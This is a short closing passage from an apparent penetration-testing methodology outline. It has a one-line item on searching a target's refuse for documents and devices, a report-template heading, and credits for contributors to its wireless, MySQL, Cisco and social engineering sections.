28.4.1.1. Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.
29. Final Report - template
30. Contributors
30.1. Matt Byrne (WirelessDefence.org)
30.1.1. Matt contributed the majority of the Wireless section.
30.2. Arvind Doraiswamy (Paladion.net)
30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
30.3. Lee Lawson (Dns.co.uk)
30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.